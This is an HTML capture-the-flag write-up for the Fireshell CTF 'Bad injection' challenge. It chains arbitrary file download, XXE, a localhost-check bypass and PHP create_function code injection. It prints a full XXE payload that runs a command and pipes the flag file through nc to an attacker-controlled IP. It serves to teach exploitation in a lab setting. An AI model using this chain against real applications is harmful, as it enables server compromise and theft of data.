<!DOCTYPE html>
<html>
<style>

		@font-face { font-family: "gohu"; src: url("/gohu.woff") format('woff'); }
		body {
			font-family: 'gohu', monospace;
			max-width: 50em;
			margin: 0 auto;
			color: white;
			background: black;
			line-height: calc(1ex / 0.32);
			margin-top: 3em;
		}
		pre {
			font-family: 'gohu', monospace;
			white-space: pre-wrap;
			line-height: 125%;
      background-color: #111;
      padding: 1em;
		}
		@media only screen and (max-width:768px) {
			body {
				max-width:100%;
			}
		}
		a:link {
			color: #0a0 ;
		}
		a:visited {
			color: #004100 ;
		}
		td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		.codehilite .hll { background-color: #0000ff }
		.codehilite { background: #000000; }
		.codehilite .c { color: #00ff00 } /* Comment */
		.codehilite .k { color: #ff0000 } /* Keyword */
		.codehilite .ch { color: #00ff00 } /* Comment.Hashbang */
		.codehilite .cm { color: #00ff00 } /* Comment.Multiline */
		.codehilite .cp { color: #e5e5e5 } /* Comment.Preproc */
		.codehilite .cpf { color: #00ff00 } /* Comment.PreprocFile */
		.codehilite .c1 { color: #00ff00 } /* Comment.Single */
		.codehilite .cs { color: #00ff00 } /* Comment.Special */
		.codehilite .kc { color: #ff0000 } /* Keyword.Constant */
		.codehilite .kd { color: #ff0000 } /* Keyword.Declaration */
		.codehilite .kn { color: #ff0000 } /* Keyword.Namespace */
		.codehilite .kp { color: #ff0000 } /* Keyword.Pseudo */
		.codehilite .kr { color: #ff0000 } /* Keyword.Reserved */
		.codehilite .kt { color: #ee82ee } /* Keyword.Type */
		.codehilite .s { color: #87ceeb } /* Literal.String */
		.codehilite .no { color: #7fffd4 } /* Name.Constant */
		.codehilite .nf { color: #ffff00 } /* Name.Function */
		.codehilite .nv { color: #eedd82 } /* Name.Variable */
		.codehilite .sa { color: #87ceeb } /* Literal.String.Affix */
		.codehilite .sb { color: #87ceeb } /* Literal.String.Backtick */
		.codehilite .sc { color: #87ceeb } /* Literal.String.Char */
		.codehilite .dl { color: #87ceeb } /* Literal.String.Delimiter */
		.codehilite .sd { color: #87ceeb } /* Literal.String.Doc */
		.codehilite .s2 { color: #87ceeb } /* Literal.String.Double */
		.codehilite .se { color: #87ceeb } /* Literal.String.Escape */
		.codehilite .sh { color: #87ceeb } /* Literal.String.Heredoc */
		.codehilite .si { color: #87ceeb } /* Literal.String.Interpol */
		.codehilite .sx { color: #87ceeb } /* Literal.String.Other */
		.codehilite .sr { color: #87ceeb } /* Literal.String.Regex */
		.codehilite .s1 { color: #87ceeb } /* Literal.String.Single */
		.codehilite .ss { color: #87ceeb } /* Literal.String.Symbol */
		.codehilite .fm { color: #ffff00 } /* Name.Function.Magic */
		.codehilite .vc { color: #eedd82 } /* Name.Variable.Class */
		.codehilite .vg { color: #eedd82 } /* Name.Variable.Global */
		.codehilite .vi { color: #eedd82 } /* Name.Variable.Instance */
		.codehilite .vm { color: #eedd82 } /* Name.Variable.Magic */
	
</style>
<head>
  <meta charset="UTF-8">
</head>

<body><h1>Bad injection <a href="https://ctftime.org/event/727"> [Fireshell CTF] </a></h1>
<h2><a href="#Enumerating-the-challenge">Enumerating the challenge</a></h2>
<p><img alt="index" src="https://i.imgur.com/vtZ1BiQ.png" /></p>
<p>looking at the first 3 pages available <strong>home</strong>, <strong>about</strong> and <strong>contact</strong>, nothing useful is presented to us. But, by accessing the <strong>List</strong> page, we got the icon of an "image
corrupted" next to the loaded image.</p>
<p>By analyzing the source of this page, it is possible to see a passage of parameters:</p>
<div class="codehilite"><pre><span></span><code><span class="n">download</span><span class="err">?</span><span class="n">file</span><span class="o">=</span><span class="n">files</span><span class="o">/</span><span class="n">test</span><span class="o">.</span><span class="n">txt</span><span class="o">&amp;</span><span class="nb">hash</span><span class="o">=</span><span class="mi">293</span><span class="n">d05cb2ced82858519bdec71a0354b</span>
</code></pre></div>


<p>this is the "corrupted image". With these parameters, we can read any file on the server. The requirements are:</p>
<ul>
<li>the file path is accurate</li>
<li>the <strong>hash</strong> parameter must contain the md5 of the searched file.</li>
</ul>
<p><img alt="listagem-diretorios" src="https://i.imgur.com/kVAupWz.png" /></p>
<h2>Exploration</h2>
<p>By scanning the server, we can find the file <strong>Routes.php</strong> inside <strong>/app/</strong> directory, where some http request is required.</p>
<div class="codehilite"><pre><span></span><code><span class="o">...</span>
<span class="o">...</span>
<span class="o">...</span>

<span class="nt">Route</span><span class="p">::</span><span class="nd">set</span><span class="o">(</span><span class="s1">&#39;custom&#39;</span><span class="o">,</span><span class="nt">function</span><span class="o">()</span><span class="p">{</span>
<span class="w">  </span><span class="err">$handler</span><span class="w"> </span><span class="err">=</span><span class="w"> </span><span class="err">fopen(&#39;</span><span class="n">php</span><span class="p">:</span><span class="o">//</span><span class="n">input</span><span class="s1">&#39;,&#39;</span><span class="n">r</span><span class="s1">&#39;);</span>
<span class="s1">  $data = stream_get_contents($handler);</span>
<span class="s1">  if(strlen($data) &gt; 1){</span>
<span class="s1">    Custom::Test($data);</span>
<span class="s1">  }else{</span>
<span class="s1">    Custom::createView(&#39;</span><span class="n">Custom</span><span class="err">&#39;</span><span class="p">);</span>
<span class="w">  </span><span class="p">}</span>
<span class="err">}</span><span class="o">);</span>
<span class="o">...</span>
<span class="o">...</span>
<span class="o">...</span>
</code></pre></div>


<p>and the <strong>Custom.php</strong> file in <strong>/app/Controllers/</strong> .  </p>
<div class="codehilite"><pre><span></span><code><span class="w">    </span><span class="nt">&lt;br</span><span class="w"> </span><span class="nt">/&gt;</span>
<span class="w">    </span><span class="nt">&lt;b&gt;</span>Notice<span class="nt">&lt;/b&gt;</span>:<span class="w">  </span>Undefined<span class="w"> </span>variable:<span class="w"> </span>type<span class="w"> </span>in<span class="w"> </span><span class="nt">&lt;b&gt;</span>/app/Controllers/Download.php<span class="nt">&lt;/b&gt;</span><span class="w"> </span>on<span class="w"> </span>line<span class="w"> </span><span class="nt">&lt;b&gt;</span>21<span class="nt">&lt;/b&gt;&lt;br</span><span class="w"> </span><span class="nt">/&gt;</span>
<span class="w">    </span><span class="cp">&lt;?php</span>

    <span class="k">class</span> <span class="nc">Custom</span> <span class="k">extends</span> <span class="nx">Controller</span><span class="p">{</span>
      <span class="k">public</span> <span class="k">static</span> <span class="k">function</span> <span class="nf">Test</span><span class="p">(</span><span class="nv">$string</span><span class="p">){</span>
          <span class="nv">$root</span> <span class="o">=</span> <span class="nb">simplexml_load_string</span><span class="p">(</span><span class="nv">$string</span><span class="p">,</span><span class="s1">&#39;SimpleXMLElement&#39;</span><span class="p">,</span><span class="nx">LIBXML_NOENT</span><span class="p">);</span>
          <span class="nv">$test</span> <span class="o">=</span> <span class="nv">$root</span><span class="o">-&gt;</span><span class="na">name</span><span class="p">;</span>
          <span class="k">echo</span> <span class="nv">$test</span><span class="p">;</span>
      <span class="p">}</span>

    <span class="p">}</span>

     <span class="cp">?&gt;</span><span class="w">  </span>
</code></pre></div>


<p>using XXE, we can also return files from the server.  </p>
<p><img alt="xxe" src="https://i.imgur.com/5aKPJVP.png" /></p>
<h2>Localhost bypass</h2>
<p>on the <strong>Routes.php</strong> file above mentioned, you can also see the following code:</p>
<div class="codehilite"><pre><span></span><code><span class="nt">Route</span><span class="p">::</span><span class="nd">set</span><span class="o">(</span><span class="s1">&#39;admin&#39;</span><span class="o">,</span><span class="nt">function</span><span class="o">()</span><span class="p">{</span>
<span class="w">  </span><span class="err">if(!isset($_REQUEST</span><span class="cp">[</span><span class="s1">&#39;rss&#39;</span><span class="cp">]</span><span class="err">)</span><span class="w"> </span><span class="err">&amp;&amp;</span><span class="w"> </span><span class="err">!isset($_REQUES</span><span class="cp">[</span><span class="s1">&#39;order&#39;</span><span class="cp">]</span><span class="err">)){</span>
<span class="w">    </span><span class="n">Admin</span><span class="p">:</span><span class="o">:</span><span class="nf">createView</span><span class="p">(</span><span class="s1">&#39;Admin&#39;</span><span class="p">);</span>
<span class="w">  </span><span class="p">}</span><span class="nt">else</span><span class="p">{</span>
<span class="w">    </span><span class="err">if($_SERVER</span><span class="cp">[</span><span class="s1">&#39;REMOTE_ADDR&#39;</span><span class="cp">]</span><span class="w"> </span><span class="err">==</span><span class="w"> </span><span class="err">&#39;127.0.0.1&#39;</span><span class="w"> </span><span class="err">||</span><span class="w"> </span><span class="err">$_SERVER</span><span class="cp">[</span><span class="s1">&#39;REMOTE_ADDR&#39;</span><span class="cp">]</span><span class="w"> </span><span class="err">==</span><span class="w"> </span><span class="err">&#39;::1&#39;){</span>
<span class="w">      </span><span class="n">Admin</span><span class="p">:</span><span class="o">:</span><span class="nf">sort</span><span class="p">(</span><span class="err">$</span><span class="n">_REQUEST</span><span class="cp">[</span><span class="s1">&#39;rss&#39;</span><span class="cp">]</span><span class="p">,</span><span class="err">$</span><span class="n">_REQUEST</span><span class="cp">[</span><span class="s1">&#39;order&#39;</span><span class="cp">]</span><span class="p">);</span>
<span class="w">    </span><span class="p">}</span><span class="nt">else</span><span class="p">{</span>
<span class="w">     </span><span class="err">echo</span><span class="w"> </span><span class="err">&quot;</span><span class="p">;</span><span class="err">(&quot;</span><span class="p">;</span>
<span class="w">    </span><span class="p">}</span>
<span class="w">  </span><span class="err">}</span>
<span class="err">}</span><span class="o">)</span>
</code></pre></div>


<p>This code verifies if that the request comes from the localhost within a conditional structure. If it does, then call Admin::sort.  </p>
<p>Looking at the <strong>Admin.php</strong> file (also downloaded enum the server), we can see that Admin::sort contains:</p>
<p><code>usort($data, create_function('$a, $b', 'return strcmp($a-&gt;'.$order.',$b-&gt;'.$order.');'));</code></p>
<p>which gives us an obvious code injection.  </p>
<hr />
<p>that way, we need to use the XXE to bypass the verification of localhost and then make a request to /Admin, which returns us the remote code execution.</p>
<p>the payload:</p>
<div class="codehilite"><pre><span></span><code><span class="cp">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;</span>
<span class="cp">&lt;!DOCTYPE foo [</span>
<span class="cp">&lt;!ELEMENT foo ANY &gt;</span>
<span class="cp">&lt;!ENTITY xxe SYSTEM &quot;http://127.0.0.1/admin?rss=http://YOUR_IP/file.xml&amp;order=link.file_get_contents(&#39;http://YOUR_IP/&#39;.exec(&#39;cat&#39;.chr(32).&#39;/da0f72d5d79169971b62a479c34198e7&#39;.chr(124).&#39;/bin/nc&#39;.chr(32).&#39;YOUR_IP&#39;.chr(32).&#39;YOUR_PORT&#39;))&quot;&gt;</span>
]&gt;
<span class="nt">&lt;root&gt;&lt;name&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/name&gt;&lt;/root&gt;</span>
</code></pre></div>


<ul>
<li>the <strong>file.xml</strong> file must be uploaded to your server, with a valid rss with the route and adminsort for request.  </li>
</ul>
<p>the output:  </p>
<p><img alt="flag" src="https://i.imgur.com/FyBD4eq.png" /><br />
<strong>Flag : f#{1_d0nt_kn0w_wh4t_i4m_d01ng}</strong>  </p>
<hr />
<ul>
<li><a href="https://www.w3schools.com/xml/xml_rss.asp">RSS W3schools</a></li>
</ul></body><hr>by cnx</html>